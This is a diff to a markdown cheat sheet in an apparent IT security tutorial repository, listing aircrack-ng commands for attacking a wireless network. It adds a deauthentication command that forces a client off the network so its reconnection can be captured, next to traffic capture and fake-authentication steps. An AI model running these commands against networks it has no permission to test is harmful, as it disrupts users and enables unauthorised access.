Moremar/IT_tutorials/CyberSecurity/Security/Tools.md

 # BSSID / power / number of beacons received / number of packets received / encryption / channel / ESSID (network name)
 airodump-ng wlan0mon

-# Start scanning the target wireless network
+# Start capturing the traffic on the target wireless network and save it to a file
 airodump-ng --channel <CHANNEL> --bssid <BSSID> --write MyHackedTraffic wlan0mon

+# force an authenticated client to deconnect, so we can capture its reconnection traffic
+# authenticated clients are listed by airdump-ng
+aireplay-ng --deauth 10 -a <BSSID> -c <CLIENT_MAC> wlan0mon

 # Keep above command running and in another terminal send an auth request
 aireplay-ng --fakeauth 0 -a <BSSID> -h <wlan0mon MAC ADDRESS> wlan0mon